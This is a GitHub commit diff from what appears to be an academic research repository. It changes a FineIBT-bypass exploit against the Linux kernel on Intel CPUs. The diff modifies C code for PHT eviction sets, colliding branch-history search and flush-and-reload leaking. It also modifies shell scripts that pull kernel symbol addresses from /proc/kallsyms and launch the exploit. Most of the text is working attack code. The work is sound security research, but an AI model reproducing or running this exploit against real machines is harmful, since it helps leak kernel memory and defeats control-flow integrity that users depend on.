Skip to content

Commit c29e4dd

Browse files
committed
[fineibt-bypass] Select PC[6] eviction branch dynamically
1 parent 367032f commit c29e4dd

File tree

6 files changed

+23
-15
lines changed

6 files changed

+23
-15
lines changed

experiments/fineibt-bypass/src/colliding_bhb.c

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -56,7 +56,7 @@ int find_colliding_history(struct config * cfg, uint8_t do_pht_eviction) {
5656
if(iter % 20000 == 0) {
5757
for (int i = 0; i < NUMBER_OF_EVICT_SETS; i++)
5858
{
59-
randomize_branch_locations(cfg->all_pht_cfg[i], 0);
59+
randomize_branch_locations(cfg->all_pht_cfg[i], cfg->pht_bit_set);
6060
}
6161
}
6262

experiments/fineibt-bypass/src/evict_pht.c

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -124,6 +124,8 @@ void randomize_branch_locations(pht_config * pht_cfg, uint8_t bit_set) {
124124

125125
// addr_off = ((addr_off + JMP_GADGET_OFFSET) & 0xfffffffffffff000 | 0x00b) - JMP_GADGET_OFFSET;
126126

127+
// Bit 6 of the PC have to be equal for the eviction branches and the
128+
// branch to be evicted
127129
if (bit_set) {
128130
addr_off = ((addr_off + JMP_GADGET_OFFSET) | 0x20) - JMP_GADGET_OFFSET;
129131
} else {

experiments/fineibt-bypass/src/flush_and_reload.h

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -51,6 +51,7 @@ struct config {
5151

5252
pht_config * pht_cfg;
5353
pht_config * all_pht_cfg[NUMBER_OF_EVICT_SETS];
54+
int pht_bit_set;
5455
};
5556

5657
void set_load_chain_simple_touch(struct config * cfg, int number_of_loads);

experiments/fineibt-bypass/src/main.c

Lines changed: 11 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -218,25 +218,25 @@ int main(int argc, char **argv)
218218
break;
219219
default:
220220
printf("Usage:\n"
221-
"%s -t TARGET_BASE [options]\n"
221+
"%s -t TARGET_BASE -u UNIX_POLL [options]\n"
222222
" -t TARGET_BASE target base address (uuid_string)\n"
223+
" -u UNIX_POLL unix_poll address (required for pht eviction set)\n"
223224
" -h HISTORY a previous found colliding history\n"
224225
" -p PHYS_MAP the start of the physical map\n"
225226
" -f FAST Disable FineIBT check during collision finding\n"
226-
" -u unix_poll address (required with -f)\n"
227227
, argv[0]);
228228
exit(1);
229229
}
230230
}
231231

232-
if (target_base == 0) {
232+
if (target_base == 0 || unix_poll_addr == 0) {
233233
printf("Usage:\n"
234-
"%s -t TARGET_BASE [options]\n"
234+
"%s -t TARGET_BASE -u UNIX_POLL [options]\n"
235235
" -t TARGET_BASE target base address (uuid_string)\n"
236+
" -u UNIX_POLL unix_poll address (required for pht eviction set)\n"
236237
" -h HISTORY a previous found colliding history\n"
237238
" -p PHYS_MAP the start of the physical map\n"
238239
" -f FAST Disable FineIBT check during collision finding\n"
239-
" -u unix_poll address (required with -f)\n"
240240
, argv[0]);
241241
exit(1);
242242
}
@@ -256,11 +256,6 @@ int main(int argc, char **argv)
256256

257257
if (fast_colliding_phase) {
258258

259-
if (unix_poll_addr == 0) {
260-
printf("Please provide the address of unix_poll (-u)\n");
261-
exit(EXIT_FAILURE);
262-
}
263-
264259
if (access(PATH_PATCH_INSERT_CHECK, F_OK) == 0) {
265260
cfg.fd_insert_check = open(PATH_PATCH_INSERT_CHECK, O_WRONLY);
266261
assert(cfg.fd_insert_check);
@@ -340,10 +335,14 @@ int main(int argc, char **argv)
340335
cfg.tfp_leak_target = (uint8_t *) (target_base + TFP_LEAK_TARGET_OFFSET);
341336
printf(" - TFP_LEAK_TARGET: %p\n", cfg.tfp_leak_target);
342337

338+
// Get 6h bit of the the target branch to be evicted (fine-ibt sid check)
339+
cfg.pht_bit_set = ((unix_poll_addr - 4) & 0x20) >> 5;
340+
printf(" - FINE_IBT SID Branch PC[6]: %d\n", cfg.pht_bit_set);
341+
343342

344343
for (size_t i = 0; i < NUMBER_OF_EVICT_SETS; i++)
345344
{
346-
cfg.all_pht_cfg[i] = init_pht_eviction(0);
345+
cfg.all_pht_cfg[i] = init_pht_eviction(cfg.pht_bit_set);
347346
}
348347
printf(" - Allocated %d PHT eviction sets\n", NUMBER_OF_EVICT_SETS);
349348

@@ -463,7 +462,7 @@ int main(int argc, char **argv)
463462

464463
for (int i = 0; i < NUMBER_OF_EVICT_SETS; i++)
465464
{
466-
randomize_branch_locations(cfg.all_pht_cfg[i], 0);
465+
randomize_branch_locations(cfg.all_pht_cfg[i], cfg.pht_bit_set);
467466
}
468467

469468
memset(hit_rates, 0, sizeof(hit_rates));

experiments/fineibt-bypass/src/run.sh

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -13,11 +13,15 @@ if [ $# -eq 1 ]
1313
PHYS_MAP=$1
1414
fi
1515

16+
echo performance | sudo tee /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor
17+
1618
make OS=LINUX_v6_6_RC4_UBUNTU ARCH=INTEL_13_GEN -B
1719

1820
UUID_STRING=`cat /proc/kallsyms | grep -w uuid_string | awk '{print $1}'`
21+
echo "uuid_string: ${UUID_STRING}"
1922

20-
echo "uid_string: ${UUID_STRING}"
23+
UNIX_POLL=`cat /proc/kallsyms | grep -w unix_poll | awk '{print $1}'`
24+
echo "unix_poll: ${UNIX_POLL}"
2125

2226

23-
taskset -c 0 ./main -t $UUID_STRING -p $PHYS_MAP
27+
taskset -c 0 ./main -t $UUID_STRING -u ${UNIX_POLL} -p $PHYS_MAP

experiments/fineibt-bypass/src/run_fast.sh

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -13,6 +13,8 @@ if [ $# -eq 1 ]
1313
PHYS_MAP=$1
1414
fi
1515

16+
echo performance | sudo tee /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor
17+
1618
make OS=LINUX_v6_6_RC4_UBUNTU ARCH=INTEL_13_GEN -B
1719

1820
UUID_STRING=`cat /proc/kallsyms | grep -w uuid_string | awk '{print $1}'`

0 commit comments

Comments
 (0)